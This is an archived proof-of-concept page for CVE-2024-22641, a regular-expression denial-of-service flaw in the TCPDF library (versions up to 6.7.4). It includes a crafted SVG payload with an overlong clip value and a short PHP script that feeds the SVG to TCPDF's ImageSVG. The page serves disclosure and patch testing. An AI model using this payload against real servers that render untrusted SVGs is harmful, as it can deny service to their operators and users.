CVE-2024-22641 PoC — TCPDF 安全漏洞

Source

https://github.com/zunak/CVE-2024-22641

Associated Vulnerability

Title:TCPDF 安全漏洞 (CVE-2024-22641)
Description:TCPDF是Tecnick开源的一个库。用于生成 PDF 文档和条形码。 TCPDF 6.7.4及之前版本存在安全漏洞，该漏洞源于容易受到ReDoS（正则表达式拒绝服务）攻击。

Readme

# CVE-2024-22641

#### Vulnerability Type
Regular expression Denial of Service (ReDoS)

#### Affected Product and Version
TCPDF <= 6.7.4

#### Attack Vector
TCPDF parse SVG file contain crafted payload.

#### Description
TCPDF version <= 6.7.4 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.

#### PoC
```svg
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
```

```php
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>
```
> Note: Checking with **preg_last_error()** after the vulnerable line of code, the regEx will exit with **PREG_BACKTRACK_LIMIT_ERROR**.

File Snapshot


 [4.0K]  /data/pocs/c7d83480988df501ba46acd9a16bfbc9d8617177
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!